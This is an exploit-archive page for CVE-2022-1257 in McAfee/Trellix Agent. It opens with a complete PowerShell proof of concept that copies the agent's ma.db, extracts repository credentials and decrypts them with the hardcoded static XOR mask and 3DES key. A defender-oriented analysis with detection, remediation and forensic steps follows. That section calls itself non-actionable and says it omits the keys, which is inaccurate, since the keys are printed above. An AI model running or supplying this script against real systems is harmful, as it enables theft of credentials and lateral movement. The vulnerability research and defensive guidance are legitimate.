McAfee Agent 5.7.6 - Insecure Storage of Sensitive Information

Exploit Author: Keenan Scott Analysis Author: www.bubbleslearn.ir Category: Remote Language: PowerShell Published Date: 2025-06-26

Exploit Title: McAfee Agent 5.7.6 - Insecure Storage of Sensitive Information
Date: 24 June 2025
Exploit Author: Keenan Scott
Vendor Homepage: hxxps[://]www[.]mcafee[.]com/
Software Download: N/A (Unable to find)
Version: < 5.7.6
Tested on: Windows 11
CVE: CVE-2022-1257

<#
.SYNOPSIS
    Dump and decrypt encrypted Windows credentials from Trellix Agent Database ("C:\ProgramData\McAfee\Agent\DB\ma.db") - PoC for CVE-2022-1257. Made by scottk817

.DESCRIPTION
    This script demonstrates exploitation of CVE-2022-1257, a vulnerability in McAfee's Trellix Agent Database where attackers can retrieve and decrypt credentials from the `ma.db` database file.

.LINK
    https://nvd.nist.gov/vuln/detail/cve-2022-1257
    https://github.com/funoverip/mcafee-sitelist-pwd-decryption/blob/master/mcafee_sitelist_pwd_decrypt.py
    https://mrd0x.com/abusing-mcafee-vulnerabilities-misconfigurations/
    https://tryhackme.com/room/breachingad

.OUTPUTS
    CSV in stdOut:
        Username,Password
#>



# Arguments
[CmdletBinding()]
param (
    [string]$DbSource = 'C:\ProgramData\McAfee\Agent\DB\ma.db',
    [string]$TempFolder = $env:TEMP
)



### Initialize use of WinSQLite3 ###
$cls = "WinSQLite_{0}" -f ([guid]::NewGuid().ToString('N'))

$code = @"
using System;
using System.Runtime.InteropServices;

public static class $cls
{
    public const int SQLITE_OK  = 0;
    public const int SQLITE_ROW = 100;

    [DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)]
    public static extern int sqlite3_open_v2(
        [MarshalAs(UnmanagedType.LPStr)] string filename,
        out IntPtr db,
        int flags,
        IntPtr vfs
    );

    [DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)]
    public static extern int sqlite3_close(IntPtr db);

    [DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)]
    public static extern int sqlite3_prepare_v2(
        IntPtr db, string sql, int nByte,
        out IntPtr stmt, IntPtr pzTail
    );

    [DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)]
    public static extern int sqlite3_step(IntPtr stmt);

    [DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)]
    public static extern IntPtr sqlite3_column_text(IntPtr stmt, int col);

    [DllImport("winsqlite3.dll", CallingConvention = CallingConvention.Cdecl)]
    public static extern int sqlite3_finalize(IntPtr stmt);
}
"@

# SQL statement to retrieve usersnames and encrypted passwords from ma.db
$sql = @"
SELECT AUTH_USER, AUTH_PASSWD
FROM AGENT_REPOSITORIES
WHERE AUTH_PASSWD IS NOT NULL;
"@

Add-Type -TypeDefinition $code -PassThru | Out-Null
$type = [type]$cls



### Decode and Decrypt ###
# Function to decode, and decrypt the credentials found in the DB using the static keys used for every Trellix agent.
function Invoke-McAfeeDecrypt {
    param([string]$B64)

    [byte[]]$mask = 0x12,0x15,0x0F,0x10,0x11,0x1C,0x1A,0x06,
                    0x0A,0x1F,0x1B,0x18,0x17,0x16,0x05,0x19
    [byte[]]$buf = [Convert]::FromBase64String($B64.Trim())
    for ($i = 0; $i -lt $buf.Length; $i++) {
        $buf[$i] = $buf[$i] -bxor $mask[$i % $mask.Length]
    }

    $sha = [System.Security.Cryptography.SHA1]::Create()
    [byte[]]$key = $sha.ComputeHash([Text.Encoding]::ASCII.GetBytes("<!@#$%^>")) + (0..3 | ForEach-Object { 0 })

    $tdes = [System.Security.Cryptography.TripleDES]::Create()
    $tdes.Mode = 'ECB'
    $tdes.Padding = 'None'
    $tdes.Key = $key
    [byte[]]$plain = $tdes.CreateDecryptor().TransformFinalBlock($buf, 0, $buf.Length)

    $i = 0
    while ($i -lt $plain.Length -and $plain[$i] -ge 0x20 -and $plain[$i] -le 0x7E) {
        $i++
    }
    if ($i -eq 0) { return '' }
    [Text.Encoding]::UTF8.GetString($plain, 0, $i)
}


### Copy ma.db ###
# Copy ma.db over to temp directory add GUID incase it already exists there.
$tmp = Join-Path $TempFolder ("ma_{0}.db" -f ([guid]::NewGuid()))
Copy-Item -LiteralPath $DbSource -Destination $tmp -Force

### Pull records ###
$dbPtr = [IntPtr]::Zero
$stmtPtr = [IntPtr]::Zero
$flags = 1
$rc = $type::sqlite3_open_v2($tmp, [ref]$dbPtr, $flags, [IntPtr]::Zero)

if ($rc -ne $type::SQLITE_OK) {
    $msg = [Runtime.InteropServices.Marshal]::PtrToStringAnsi(
        $type::sqlite3_errmsg($dbPtr))
    Throw "sqlite3_open_v2 failed (code $rc) : $msg"
}

$rc = $type::sqlite3_prepare_v2($dbPtr, $sql, -1, [ref]$stmtPtr, [IntPtr]::Zero)

if ($rc -ne $type::SQLITE_OK) {
    $msg = [Runtime.InteropServices.Marshal]::PtrToStringAnsi(
        $type::sqlite3_errmsg($dbPtr))
    $type::sqlite3_close($dbPtr) | Out-Null
    Throw "sqlite3_prepare_v2 failed (code $rc) : $msg"
}

$buffer = [System.Collections.Generic.List[string]]::new()
while ($type::sqlite3_step($stmtPtr) -eq $type::SQLITE_ROW) {
    $uPtr = $type::sqlite3_column_text($stmtPtr, 0)
    $pPtr = $type::sqlite3_column_text($stmtPtr, 1)

    $user = [Runtime.InteropServices.Marshal]::PtrToStringAnsi($uPtr)
    $pass = [Runtime.InteropServices.Marshal]::PtrToStringAnsi($pPtr)

    if ($user -and $pass) {
        $buffer.Add("$user,$pass")
    }
}

### Cleanup ###
# Finish and close SQL
$type::sqlite3_finalize($stmtPtr) | Out-Null
$type::sqlite3_close($dbPtr) | Out-Null

# Delete the ma.db file copied to the temp file
Remove-Item $tmp -Force -ErrorAction SilentlyContinue

### Process encrypted credentials ###
# For each row of credentials decrypt them and print plaintext to standard out.
foreach ($line in $buffer) {
    $rec = $line -split ',', 2
    if ($rec.Length -eq 2) {
        $username = $rec[0]
        try {
            $password = Invoke-McAfeeDecrypt $rec[1]
        } catch {
            $password = "[DECRYPT-ERROR] $_"
        }
        "Username,Password"
        "$username,$password"
    }
}

Overview — McAfee/Trellix Agent 5.7.6: Insecure Storage of Sensitive Information (CVE-2022-1257)

CVE-2022-1257 describes an insecure storage vulnerability in McAfee (Trellix) Agent installations prior to version 5.7.6 where stored repository credentials in the agent database (ma.db) can be read and decrypted by an attacker with local read access. The issue stems from the use of a static encoding/encryption design and predictable storage location, allowing attackers or misconfigured processes to recover sensitive secrets used by the agent.

Why this matters

Repository/service credentials stored by endpoint agents often have elevated privileges or are reused, so disclosure can enable lateral movement, exfiltration or further compromise.
The agent database (typically under C:\ProgramData\McAfee\Agent\DB\ma.db on Windows) is readable by processes with local access; if an attacker already has local code execution or can read ProgramData, they may extract secrets.
Static cryptographic material (masks, keys, or derivation that is identical across installations) removes per-installation entropy and makes decryption trivial once the scheme is known.

Technical summary (high level, non-actionable)

At a conceptual level, the vulnerable agent stores authentication entries in a SQLite database table (e.g., AGENT_REPOSITORIES) in an encoded/encrypted form. Security researchers demonstrated that the encoding process used a fixed and predictable transform plus symmetric block cipher operations using static derivation material embedded in the agent's code. Because the keying material and transformation are constant across installations, an attacker who can read the database file can reverse the transform and obtain plaintext credentials.

Scope and affected versions

Product: McAfee / Trellix Agent
Affected versions: versions prior to 5.7.6 (per vendor advisory / CVE)
Tested environment reported: Windows 11 (local file read privileges required)
CVE: CVE-2022-1257

Impact and risk assessment

Impact	Risk	Notes
Credential disclosure	High	Credentials can be used for lateral movement, service abuse, or privilege escalation depending on their scope.
Persistence and exfiltration	Medium–High	Harvested secrets may enable ongoing unauthorized access or data retrieval.
Attack surface	Moderate	Requires local file read (or read via low-privileged processes). Remote exploitation would require a separate vector.

Detection and monitoring guidance

Monitor for unexpected reads of files under the agent DB path (e.g., C:\ProgramData\McAfee\Agent\DB\ma.db). File-read operations by unusual processes or accounts should be investigated.
Look for suspicious PowerShell or command-line processes that read binary blobs, perform base64 operations, or spawn cryptographic libraries and then transmit small text blobs off-host.
Search logs for creation/copies of ma.db outside normal maintenance windows — attackers often copy the DB to a staging location before offline analysis.
Correlate any access to ma.db with other lateral movement indicators (new service installs, scheduled task creation, remote execution events).

Safe analysis approach (for defenders and researchers)

If you need to analyze a potentially compromised agent database for investigation or recovery, follow forensic best practices:

Work on a forensic copy — do not modify the original ma.db. Create a bitwise copy and verify integrity via hashes.
Perform analysis in an isolated lab that is air-gapped or network-restricted to prevent accidental credential leakage.
Do not reuse recovered credentials in production until you have rotated them and validated the environment.
Coordinate with your vendor (Trellix/McAfee) and legal/compliance teams when handling possible compromise data.

Pseudo-code (conceptual) showing the investigative workflow — non-executable

// Pseudo-code: conceptual steps only (do NOT execute on production systems)
1. copy_file_for_analysis(original_path, destination_lab_copy)
2. open_sqlite_database(destination_lab_copy)
3. rows = query("SELECT AUTH_USER, AUTH_PASSWD FROM AGENT_REPOSITORIES WHERE AUTH_PASSWD IS NOT NULL")
4. for each row in rows:
     enc_blob = row.AUTH_PASSWD
     decoded = base64_decode(enc_blob)          // conceptual decode step
     transformed = reverse_transform(decoded)  // conceptual: undo install-wide transform
     plaintext = symmetric_decrypt(transformed, derived_key) // key derivation concept
     output(row.AUTH_USER, plaintext)

Explanation: The pseudo-code above outlines the high-level forensic flow: create a copy of the database, extract the stored username and encoded password fields, and then conceptually reverse the encoding and decryption steps. This is intentionally non-specific and does not include actual masks, keys, algorithm parameters or practical decryption steps — those details are sensitive because they enable misuse.

Remediation and mitigation

Immediate steps every administrator should take:

Patch: Upgrade Trellix/McAfee Agent to version 5.7.6 or later as provided by the vendor. This is the definitive fix recommended by the vendor.
Credential rotation: After patching, rotate any repository/service credentials that were stored in the agent prior to patching. Treat them as compromised if they were stored on affected agents.
Restrict access: Harden file system permissions on agent data paths (ProgramData\McAfee\Agent\DB) so that only the minimum necessary system accounts have read access.
Inventory & audit: Identify all endpoints running vulnerable agent versions and maintain an up-to-date inventory of agent deployments and versions.
Least privilege: Avoid storing reusable or high-privilege credentials in endpoint agent databases; prefer secrets management solutions with per-host or per-instance keys and rotation policies.

Longer-term hardening

Adopt secure secret storage practices: per-host keys, hardware-backed key stores (TPM/HSM), or secrets managers that avoid long-lived, system-wide static keys.
Application design: Agents should use OS-provided protected storage APIs and unique, non-static key derivation per installation.
Continuous monitoring and alerting for sensitive-file access and suspicious credential-access patterns.

Forensic response checklist

Isolate affected hosts from the network if compromise is suspected.
Collect forensic images and copies of the agent DB for offline analysis; capture process and connection artifacts around the time of suspected access.
Hash and store evidence securely (write-protected) for chain-of-custody.
Rotate all secrets found in the agent DB and review service/account usage for unauthorized activity.
Engage vendor support for guidance on patching and any additional compensating controls.

Responsible usage and testing

Testing or exploiting this class of vulnerability should only be performed in environments where you have explicit authorization (e.g., an approved penetration test, red team engagement or a lab environment). Misuse of techniques to extract credentials from production systems without authorization is unlawful and dangerous.

References and further reading

NVD entry and CVE details (CVE-2022-1257) — consult NIST/NVD for official summary and references.
Vendor advisories and release notes — always follow Trellix/McAfee published guidance when patching and remediating.
General guidance on secure secret storage and endpoint hardening from recognized standards bodies and vendors.